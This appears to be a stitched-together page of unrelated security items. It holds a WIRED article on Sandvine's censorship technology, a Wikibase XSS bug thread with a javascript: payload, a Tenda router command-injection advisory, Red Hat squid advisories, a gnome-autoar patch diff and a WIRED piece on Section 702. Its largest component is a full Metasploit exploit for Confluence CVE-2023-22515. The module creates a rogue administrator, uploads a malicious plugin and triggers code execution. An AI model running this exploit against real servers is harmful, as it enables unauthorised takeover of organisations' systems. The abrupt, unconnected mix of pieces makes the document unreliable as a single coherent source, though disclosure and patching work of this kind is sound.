Canada-based Sandvine has long sold its web-monitoring tech to authoritarian regimes. This week, the US sanctioned the company, severely limiting its ability to do business with American firms.

When the Egyptian government shut down the internet in 2011 to give itself cover to crush a popular protest movement, it was Nora Younis who got the word out. Younis, then a journalist with daily newspaper _Al-Masry Al-Youm_, found a working internet connection at the InterContinental Cairo Semiramis Hotel that overlooked Tahrir Square, the heart of the protests. From the balcony, she filmed as protesters were shot and run down with armored vehicles, posting the footage to the newspaper’s website, where it was picked up by global media.

In 2016, with Egypt having slid back into the authoritarianism that prompted the uprising, Younis launched her own media platform, Al-Manassa, which combined citizen journalism with investigative reporting. The following year, Almanassa.com suddenly disappeared from the Egyptian internet, along with a handful of other independent publications. It was still available overseas, but domestic users couldn’t see it. Younis’ team moved their site to a new domain. That, too, was rapidly blocked, so they moved again and were blocked again. After three years and more than a dozen migrations to new domains and subdomains, they asked for help from the Swedish digital forensics nonprofit Qurium, which figured out how the blocks were being implemented—using a network management tool provided by a Canadian tech company called Sandvine.

Sandvine is well known in digital rights circles, but unlike leading villains of the spyware world such as NSO Group or Candiru, it’s often floated below the eyeline of lawmakers and regulators. The company, owned by the private equity group Francisco Partners, mainly sells above-board technology to internet service providers and telecom companies to help them run their networks. But it has often sold that technology to regimes that have abused it, using it to censor, shut down, and surveil activists, journalists, and political opponents.

On Monday, after years of lobbying from digital rights activists, the US Department of Commerce added Sandvine to its Entity List, effectively blacklisting it from doing business with American partners. The department said that the company’s technology was “used in mass-web monitoring and censorship” in Egypt, “contrary to the national security and foreign policy interests of the United States.” Digital rights activists say it’s a major victory because it shows that companies can’t avoid responsibility when they sell potentially dangerous products to clients who are likely to abuse them.

“Better late than never,” Tord Lundström, Qurium’s technical director, says. “Sandvine is a shameless example of how technology is not neutral when seeking profit at all costs.”

”We are aware of the action announced by the US Commerce Department, and we’re working closely with government officials to understand, address, and resolve their concerns,” says Sandvine spokesperson Susana Schwartz. “Sandvine solutions help provide a reliable and safe internet, and we take allegations of misuse very seriously.”

Sandvine’s flagship product is deep packet inspection, or DPI, a common tool used by ISPs and telecom companies to monitor traffic and prioritize certain types of content. DPI lets network administrators see what’s in a packet of data flowing on the network in real time, so it can intercept or divert it. It can be used, for example, to give priority to traffic from streaming services over static web pages or downloads, so that users don’t see glitches in their streams. It has been used in some countries to filter out child sexual abuse images.

Dictators Used Sandvine Tech to Censor the Internet. The US Finally Did Something About It

In MediaWiki through 1.37, XSS can occur in Wikibase because an external identifier property can have a URL format that includes a $1 formatter substitution marker, and the javascript: URL scheme (among others) can be used.

**

XSS in Wikibase using formatter URL

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

Users can specify a URL format in an external identifier property using a formatter URL with a string like "https://viaf.org/viaf/$1" and then use the external identifier property in an item to substitute a string into the URL. However there seems to be no protocol validation, meaning users can use a string like "javascript:alert() //$1" to execute javascript when the URL is clicked.

Risk Rating

Low

Author Affiliation

Wikimedia Communities

*   Task Graph

**Event Timeline**

Comment Actions

> Someone seems to have noticed this before me as you can see at https://test.wikidata.org/wiki/Property:P95266. So either this is a duplicate task or it just wasn't reported, or it's some sort of regression.

We get a lot of folks who play around/test things out on live wikis. Given the author's history, I doubt this was at all intentionally malicious, though it might not be a terrible idea to delete/os that wikidata item just to be safe, in that it actively points any would-be attacker in the correct direction here.

Also, specifically adding a few WMDE folks here for additional attention.

Comment Actions

I made myself oversighter (let me know if I should !log that, I wasn’t sure) and deleted the property. I hope that doesn’t generate a notification to the user, though even if it does, they hopefully won’t remember what the property was (given that it was created in February 2020; I didn’t put any details in the log message).

Comment Actions

Looks like the only currently used protocols (on Wikidata) are https (4650 times), http (1829), tel (2), and httsp (1, clearly a typo). We allow some more protocols in URL values (e.g. email; UrlSchemeValidators::getValidator() has a fairly long list), but it looks like those aren’t used in formatter URLs at the moment, so let’s limit those to https, http and tel for now. (And by “limit”, I mean that we just don’t use the formatter URL if it uses another property, though we won’t block anyone from saving it.)

TODO: Also look into formatter URI for RDF resource.

Comment Actions

Proposed patch:

I haven’t yet been able to reproduce this issue locally – I think formatter URLs have some weird caching.

Comment Actions

As far as I can tell, the ExternalIdentifierRdfBuilder has the same problem, i.e. we might emit javascript: “URIs” in our RDF output. (I’ve been able to reproduce this locally, too – note that the property must have the datatype external-id.) I’m not sure if that’s considered a security issue? I don’t think we make these URIs clickable anywhere on wikidata.org; on query.wikidata.org, users can build arbitrary URIs anyways (example).

Comment Actions

> Proposed patch:
> 
> I haven’t yet been able to reproduce this issue locally – I think formatter URLs have some weird caching.

I have been able to reproduce it locally now and the patch seems to fix it. (It looks like turning the property into an external-id one was required – I thought we also supported formatter URLs on the string type, but I might’ve been wrong. Try running php extensions/Wikibase/repo/maintenance/changePropertyDataType.php --new-data-type external-id --property-id P\_\_\_, or just make sure your test property ID for this task has datatype external identifier to begin with.)

Comment Actions

> > Someone seems to have noticed this before me as you can see at https://test.wikidata.org/wiki/Property:P95266. So either this is a duplicate task or it just wasn't reported, or it's some sort of regression.
> 
> We get a lot of folks who play around/test things out on live wikis. Given the author's history, I doubt this was at all intentionally malicious, though it might not be a terrible idea to delete/os that wikidata item just to be safe, in that it actively points any would-be attacker in the correct direction here.

The user in question is @Bugreporter on Phabricator, by the way, if anyone wants to check if they created any security tasks which this might be a duplicate of. (I’m not in acl\*security, so I can’t check myself.)

Comment Actions

> Deployed to wmf.9 and .12, and notified @hashar for wmf.13 coordination. Bug no longer occurs on Special:Undelete for that property, where it had previously still been reproducible. (Note: requires oversighter rights to see.)

Thanks, I've updated T276237 and T292236.

> The user in question is @Bugreporter on Phabricator, by the way, if anyone wants to check if they created any security tasks which this might be a duplicate of. (I’m not in acl\*security, so I can’t check myself.)

Subbing them to see if they remember (I view this action as very low-risk in the context of this bug).

sbassett changed the task status from Open to In Progress.Tue, Dec 14, 7:07 PM

sbassett triaged this task as Low priority.

sbassett changed Author Affiliation from N/A to Wikimedia Communities.

sbassett changed Risk Rating from N/A to Low.

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

CVE-2021-45472: ⚓ T297570 XSS in Wikibase using formatter URL

Improper buffer size check logic in aviextractor library prior to SMR May-2022 Release 1 allows out of bounds read leading to possible temporary denial of service. The patch adds buffer size check logic.

CVE-2022-28788

Tenda Technology Co.,Ltd HG6 3.3.0-210926 was discovered to contain a command injection vulnerability via the pingAddr and traceAddr parameters. This vulnerability is exploited via a crafted POST request.

Title: Tenda HG6 v3.3.0 Remote Command Injection Vulnerability  
Advisory ID: ZSL-2022-5706  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 03.05.2022

**Summary**

HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1\*GE,3\*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications.

**Description**

The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

**Vendor**

Tenda Technology Co.,Ltd. - https://www.tendacn.com

**Affected Version**

Firmware version: 3.3.0-210926  
Software version: v1.1.0  
Hardware Version: v1.0  
Check Version: TD\_HG6\_XPON\_TDE\_ISP

**Tested On**

Boa/0.93.15

**Vendor Status**

\[22.04.2022\] Vulnerability discovered.  
\[26.04.2022\] Vendor contacted.  
\[01.05.2022\] No response from the vendor.  
\[03.05.2022\] Public security advisory released.

**PoC**

tenda\_hg6\_cmdinj.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://packetstormsecurity.com/files/166932/Tenda-HG6-3.3.0-Remote-Command-Injection.html  
\[2\] https://cxsecurity.com/issue/WLB-2022050009  
\[3\] https://exchange.xforce.ibmcloud.com/vulnerabilities/225715  
\[4\] https://sploitus.com/exploit?id=ZSL-2022-5706  
\[5\] https://www.exploit-db.com/exploits/50916  
\[6\] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30425  
\[7\] https://nvd.nist.gov/vuln/detail/CVE-2022-30425

**Changelog**

\[03.05.2022\] - Initial release  
\[09.05.2022\] - Added reference \[1\], \[2\], \[3\] and \[4\]  
\[13.05.2022\] - Added reference \[5\]  
\[29.05.2022\] - Added reference \[6\] and \[7\]

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

CVE-2022-30425: Zero Science Lab » Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

This Metasploit module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for Java objects to be modified at run time. The exploit will create a new administrator user and upload a malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2, 8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Retry  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an improper input validation issue in Atlassian Confluence, allowing arbitrary HTTP          parameters to be translated into getter/setter sequences via the XWorks2 middleware and in turn allows for          Java objects to be modified at run time. The exploit will create a new administrator user and upload a          malicious plugins to get arbitrary code execution. All versions of Confluence between 8.0.0 through to 8.3.2,          8.4.0 through to 8.4.2, and 8.5.0 through to 8.5.1 are affected.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF Exploit & Rapid7 Analysis        ],        'References' => [          ['CVE', '2023-22515'],          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'],          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],        ],        'DisclosureDate' => '2023-10-04',        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default.        'Targets' => [          [            'Automatic',            {              'Platform' => 'java',              'Arch' => [ARCH_JAVA]            }          ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          # Note we cannot delete the admin user we create, as Confluence prevents a user deleting themself.          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # By default Confluence listens for HTTP requests on TCP port 8090.        Opt::RPORT(8090),        # Confluence may have a non default base path, allow user to configure that here.        OptString.new('TARGETURI', [true, 'Base path for Confluence', '/']),        # The endpoint we target to trigger the vulnerability.        OptString.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', 'server-info.action']),        # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.        OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])    )    return CheckCode::Unknown('Connection failed') unless res    # Ensure target is a Confluence server by identifying an expected HTTP header.    return CheckCode::Unknown('No \'X-Confluence-Request-Time\' header') unless res.headers.key? 'X-Confluence-Request-Time'    if res.code == 200 && res.body      # Pull out the version string from one of three known locations within the HTML.      m = res.body.match(/ajs-version-number" content="(\d+\.\d+\.\d+)"/i)      if m.nil?        m = res.body.match(/Printed by Atlassian Confluence (\d+\.\d+\.\d+)/i)        if m.nil?          m = res.body.match(%r{<span id='footer-build-information'>(\d+\.\d+\.\d+)</span>}i)        end      end      unless m.nil?        version = Rex::Version.new(m[1])        ranges = [          ['8.0.0', '8.3.2'],          ['8.4.0', '8.4.2'],          ['8.5.0', '8.5.1']        ]        # If we have a Confluence server within the given version ranges, it appears vulnerable.        ranges.each do |min, max|          if version.between?(Rex::Version.new(min), Rex::Version.new(max))            return Exploit::CheckCode::Appears("Atlassian Confluence #{version}")          end        end        # By here we know we have a confluence server, but the version found indicates it is safe.        return Exploit::CheckCode::Safe("Atlassian Confluence #{version}")      end    end    # By here we have identified a Confluence server, but could not get the version number to determine if it is    # vulnerable of not.    CheckCode::Detected  end  def exploit    target_endpoint = normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])    print_status("Setting the application configuration's setupComplete to false via endpoint: #{target_endpoint}")    # 1. Leverage CVE-2023-22515 to modify a configuration setting, allowing us to reach the /setup/* endpoints.    res = send_request_cgi(      'method' => 'POST',      'uri' => target_endpoint,      'vars_post' => {        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'      }    )    unless res&.code == 302 || res&.code == 200      fail_with(Failure::UnexpectedReply, "Unexpected reply from endpoint: #{target_endpoint}")    end    print_status('Creating a new administrator user account...')    # usernames must be lowercase    admin_username = rand_text_alpha_lower(8)    admin_password = rand_text_alphanumeric(8)    # 2. Create a new administrator user account.    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'setup', 'setupadministrator.action'),      'headers' => {        'X-Atlassian-Token' => 'no-check'      },      'vars_post' => {        'username' => admin_username,        'fullName' => rand_text_alphanumeric(8),        # The email address does not need to be a valid address, but it must contain an @ character.        'email' => "#{rand_text_alphanumeric(8)}@#{rand_text_alphanumeric(8)}",        'password' => admin_password,        'confirm' => admin_password,        'setup-next-button' => 'Next'      }    )    unless res&.code == 302 || res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/setupadministrator.action')    end    print_status("Created #{admin_username}:#{admin_password}")    # 3. Force the setup to become completed, to allow normal Confluence operations to continue.    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'setup', 'finishsetup.action'),      'headers' => {        'X-Atlassian-Token' => 'no-check'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/finishsetup.action')    end    print_status('Adding a malicious plugin...')    # 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token.    res = send_request_cgi(      'method' => 'GET',      # Note, we concatenate '/' as this is required by the endpoint.      'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',      'headers' => {        'Authorization' => basic_auth(admin_username, admin_password),        'Accept' => '*/*'      },      'vars_get' => {        'os_authType' => 'basic'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /rest/plugins/1.0/')    end    upm_token = res.headers['upm-token']    unless upm_token      fail_with(Failure::UnexpectedReply, 'No UPM token from endpoint: /rest/plugins/1.0/')    end    begin      payload_endpoint = rand_text_alphanumeric(8)      plugin_key = rand_text_alpha(8)      # 5. Construct a malicious Servlet plugin JAR file. We set :random to true which will randomize the string      # 'metasploit' in the class paths (via Rex::Zip::Jar::add_sub).      jar = payload.encoded_jar(random: true)      jar.add_file(        'atlassian-plugin.xml',        %(<atlassian-plugin name="#{rand_text_alpha(8)}" key="#{plugin_key}" plugins-version="2">  <plugin-info>    <description>#{rand_text_alphanumeric(8)}</description>    <version>#{rand(1024)}.#{rand(1024)}</version>  </plugin-info>  <servlet key="#{rand_text_alpha(8)}" class="#{jar.substitutions['metasploit']}.PayloadServlet">    <url-pattern>#{normalize_uri(payload_endpoint)}</url-pattern>  </servlet></atlassian-plugin>)      )      jar.add_file('metasploit/PayloadServlet.class', MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class'))      message = Rex::MIME::Message.new      message.add_part(jar.pack, 'application/octet-stream', 'binary', "form-data; name=\"plugin\"; filename=\"#{rand_text_alphanumeric(8)}.jar\"")      # 6. Upload the malicious plugin.      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') + '/',        'ctype' => 'multipart/form-data; boundary=' + message.bound,        'headers' => {          'Authorization' => basic_auth(admin_username, admin_password),          'Accept' => '*/*'        },        'vars_get' => {          'token' => upm_token        },        'data' => message.to_s      )      unless res&.code == 202        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply code from endpoint: /rest/plugins/1.0/')      end      unless res.body =~ %r{<textarea>(.+)</textarea>}        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply data from endpoint: /rest/plugins/1.0/')      end      begin        plugin_json = JSON.parse(::Regexp.last_match(1))      rescue JSON::ParserError        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, failed to parse JSON data from endpoint: /rest/plugins/1.0/')      end      # We receive a JSON object like this:      # <textarea>{"type":"INSTALL","pingAfter":100,"status":{"done":false,"statusCode":200,"contentType":"application/vnd.atl.plugins.install.installing+json","source":"JQEjEJBr.jar","name":"JQEjEJBr.jar"},"links":{"self":"/rest/plugins/1.0/pending/52227753-1c3e-496f-a4f4-d52a8b3850dc","alternate":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc"},"timestamp":1697471602188,"userKey":"4028d6b28b294680018b39311d17001e","id":"52227753-1c3e-496f-a4f4-d52a8b3850dc"}</textarea>      links_alternate = plugin_json&.dig('links', 'alternate')      if links_alternate.nil?        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, no alternate link in reply from endpoint: /rest/plugins/1.0/')      end      print_status('Waiting for plugin to be installed...')      # 7. The plugin is installed asynchronously, so we poll the server for installation to be completed.      plugin_ready = retry_until_truthy(timeout: datastore['CONFLUENCE_PLUGIN_TIMEOUT']) do        res = send_request_cgi(          'method' => 'GET',          'uri' => normalize_uri(target_uri.path, links_alternate)        )        # We receive a JSON result to indicate if the plugin is finished installing.        # {"links":{"self":"/rest/plugins/1.0/tasks/52227753-1c3e-496f-a4f4-d52a8b3850dc","result":"/rest/plugins/1.0/plkWITNH-key"},"done":true,"type":"INSTALL","progress":1.0,"pollDelay":100,"timestamp":1697471602188}        if res&.code == 200          begin            res_json = JSON.parse(res.body)            next res_json['done']          rescue JSON::ParserError            next false          end        end        false      end      unless plugin_ready        fail_with(Failure::TimeoutExpired, 'Uploading plugin failed, timeout while waiting to install.')      end      print_status('Triggering payload...')      # 8. Trigger the payload by performing a request to the malicious servlet endpoint.      res = send_request_cgi(        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'plugins', 'servlet', payload_endpoint)      )      unless res&.code == 200        fail_with(Failure::PayloadFailed, "Triggering payload failed, unexpected reply from endpoint: /plugins/servlet/#{payload_endpoint}")      end    ensure      print_status('Deleting plugin...')      # 9. Delete the plugin we uploaded as we no longer need it. We cannot delete the admin user we created as      # Confluence doesnt allow a user to delete themself.      res = send_request_cgi(        'method' => 'DELETE',        'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0', "#{plugin_key}-key"),        'headers' => {          'Authorization' => basic_auth(admin_username, admin_password),          'Connection' => 'close'        }      )      unless res&.code == 204        print_warning("Deleting plugin failed, unexpected reply from endpoint: /plugins/servlet/#{payload_endpoint}")      end    end  endend

Atlassian Confluence Unauthenticated Remote Code Execution

Red Hat Security Advisory 2024-0771-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0771.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: squid:4 security update  
Advisory ID:        RHSA-2024:0771-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0771  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2023-5824  
====================================================================

Summary: 

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Squid is a high-performance proxy caching server for web clients, supporting FTP, and HTTP data objects.

Security Fix(es):

* squid: DoS against HTTP and HTTPS (CVE-2023-5824)

* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)

* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)

* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)

* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)

* squid: denial of service in HTTP request parsing (CVE-2023-50269)

Bug Fix(es):

* squid crashes in assertion when a parent peer exists (RHEL-18255)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5824

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245914  
https://bugzilla.redhat.com/show_bug.cgi?id=2247567  
https://bugzilla.redhat.com/show_bug.cgi?id=2248521  
https://bugzilla.redhat.com/show_bug.cgi?id=2252923  
https://bugzilla.redhat.com/show_bug.cgi?id=2252926  
https://bugzilla.redhat.com/show_bug.cgi?id=2254663

Red Hat Security Advisory 2024-0771-03

Red Hat Security Advisory 2024-0397-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0397.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: squid:4 security update  
Advisory ID:        RHSA-2024:0397-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0397  
Issue date:         2024-01-24  
Revision:           03  
CVE Names:          CVE-2023-5824  
====================================================================

Summary: 

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Squid is a high-performance proxy caching server for web clients, supporting FTP, and HTTP data objects.

Security Fix(es):

* squid: DoS against HTTP and HTTPS (CVE-2023-5824)

* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)

* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)

* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)

* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)

* squid: denial of service in HTTP request parsing (CVE-2023-50269)

Bug Fix(es):

* squid crashes in assertion when a parent peer exists (JIRA:RHEL-18256)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5824

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245914  
https://bugzilla.redhat.com/show_bug.cgi?id=2247567  
https://bugzilla.redhat.com/show_bug.cgi?id=2248521  
https://bugzilla.redhat.com/show_bug.cgi?id=2252923  
https://bugzilla.redhat.com/show_bug.cgi?id=2252926  
https://bugzilla.redhat.com/show_bug.cgi?id=2254663

Red Hat Security Advisory 2024-0397-03

autoar-extractor.c in GNOME gnome-autoar before 0.3.1, as used by GNOME Shell, Nautilus, and other software, allows Directory Traversal during extraction because it lacks a check of whether a file's parent is a symlink in certain complex situations. NOTE: this issue exists because of an incomplete fix for CVE-2020-36241.

...

...

@@ -921,27 +921,42 @@ autoar\_extractor\_do\_sanitize\_pathname (AutoarExtractor \*self,

return extracted\_filename;

}

static gboolean

autoar\_extractor\_check\_file\_conflict (GFile \*file,

/\* The function checks @file for conflicts with already existing files on the

\* disk. It also recursively checks parents of @file to be sure it is directory.

\* It doesn't follow symlinks, so symlinks in parents are also considered as

\* conflicts even though they point to directory. It returns #GFile object for

\* the file, which cause the conflict (so @file, or some of its parents). If

\* there aren't any conflicts, NULL is returned.

\*/

static GFile \*

autoar\_extractor\_check\_file\_conflict (AutoarExtractor \*self,

GFile \*file,

mode\_t extracted\_filetype)

{

GFileType file\_type;

g\_autoptr (GFile) parent \= NULL;

file\_type \= g\_file\_query\_file\_type (file,

G\_FILE\_QUERY\_INFO\_NOFOLLOW\_SYMLINKS,

NULL);

/\* If there is no file with the given name, there will be no conflict \*/

if (file\_type \== G\_FILE\_TYPE\_UNKNOWN) {

return FALSE;

/\* It is a conflict if the file already exists with an exception for already

\* existing directories.

\*/

if (file\_type != G\_FILE\_TYPE\_UNKNOWN &&

(file\_type != G\_FILE\_TYPE\_DIRECTORY ||

extracted\_filetype != AE\_IFDIR)) {

return g\_object\_ref (file);

}

/\* It is not problem if the directory already exists \*/

if (file\_type \== G\_FILE\_TYPE\_DIRECTORY &&

extracted\_filetype \== AE\_IFDIR) {

return FALSE;

if ((self\->new\_prefix && g\_file\_equal (self\->new\_prefix, file)) ||

(!self\->new\_prefix && g\_file\_equal (self\->destination\_dir, file))) {

return NULL;

}

return TRUE;

/\* Check also parents for conflict to be sure it is directory. \*/

parent \= g\_file\_get\_parent (file);

return autoar\_extractor\_check\_file\_conflict (self, parent, AE\_IFDIR);

}

static void

...

...

@@ -1864,7 +1879,7 @@ autoar\_extractor\_step\_extract (AutoarExtractor \*self) {

g\_autoptr (GFile) extracted\_filename \= NULL;

g\_autoptr (GFile) hardlink\_filename \= NULL;

AutoarConflictAction action;

gboolean file\_conflict;

g\_autoptr (GFile) file\_conflict \= NULL;

if (g\_cancellable\_is\_cancelled (self\->cancellable)) {

archive\_read\_free (a);

...

...

@@ -1883,11 +1898,27 @@ autoar\_extractor\_step\_extract (AutoarExtractor \*self) {

}

/\* Attempt to solve any name conflict before doing any operations \*/

file\_conflict \= autoar\_extractor\_check\_file\_conflict (extracted\_filename,

file\_conflict \= autoar\_extractor\_check\_file\_conflict (self,

extracted\_filename,

archive\_entry\_filetype (entry));

while (file\_conflict) {

GFile \*new\_extracted\_filename \= NULL;

/\* Do not try to solve any conflicts in parents for now. Especially

\* symlinks in parents are dangerous as it can easily happen that files

\* are written outside of the destination. The tar cmd fails to extract

\* such archives with ENOTDIR. Let's do the same here. This is most

\* probably malicious, or corrupted archive if the conflict was caused

\* only by files from the archive...

\*/

if (!g\_file\_equal (file\_conflict, extracted\_filename)) {

self\->error \= g\_error\_new (G\_IO\_ERROR,

G\_IO\_ERROR\_NOT\_DIRECTORY,

"The file is not a directory");

archive\_read\_free (a);

return;

}

action \= autoar\_extractor\_signal\_conflict (self,

extracted\_filename,

&new\_extracted\_filename);

...

...

@@ -1923,7 +1954,9 @@ autoar\_extractor\_step\_extract (AutoarExtractor \*self) {

break;

}

file\_conflict \= autoar\_extractor\_check\_file\_conflict (extracted\_filename,

g\_clear\_object (&file\_conflict);

file\_conflict \= autoar\_extractor\_check\_file\_conflict (self,

extracted\_filename,

archive\_entry\_filetype (entry));

}

...

...

CVE-2021-28650: extractor: Do not allow symlink in parents (8109c368) · Commits · GNOME / gnome-autoar

Top congressional lawmakers are meeting in private to discuss the future of a widely unpopular surveillance program, worrying members devoted to reforming Section 702.

Twice in the past decade, legislation limiting the United States government’s domestic surveillance powers sailed through the US House of Representatives. Attached to bills that would ultimately become law, both of these pro-privacy amendments were killed off in the final hours of consideration—erased each time in secret meetings held among a select group of congressional power brokers. Capitol Hill sources familiar with ongoing negotiations over a top US surveillance program fear House leaders may once again scrap popular civil-liberty-focused reforms.

Last week, House members became aware that closed-door discussions were ongoing at the highest levels concerning the latest pro-privacy reforms to gain widespread legislative support. Public reporting on the discussions, first disclosed by Politico, set off a firestorm of speculation over whether another deal may have been quietly struck to prolong a domestic surveillance program no longer assumed to have the support of a majority of Congress.

Sources with knowledge of ongoing negotiations over the future of Section 702—a controversial but pivotal US foreign surveillance program—say a host of pro-privacy reforms, including new warrant requirements for obtaining commercially available data, have gained serious traction among an anomalous coalition of progressives and conservatives otherwise at odds on most matters. WIRED granted these sources anonymity because they were not authorized to speak publicly about ongoing negotiations.

A source with knowledge of the 702 fight tells WIRED that last week House speaker Mike Johnson and House majority leader Steve Scalise met privately about drafting a new bill to reauthorize the program—an attempt to somehow merge existing bills introduced separately in December by the House Judiciary and Intelligence committees. The history of genuine privacy legislation being killed off in these closed-door sessions immediately sparked concerns among reformers.

“This is the room where we get fucked,” one civil liberties expert tells WIRED.

Senior aides on the Hill, working from offices on both ends of the surveillance fight, say there is a 90 percent agreement among the two bipartisan factions. It is the final 10 percent—composed almost entirely of the warrant issue—on which neither is willing to budge.

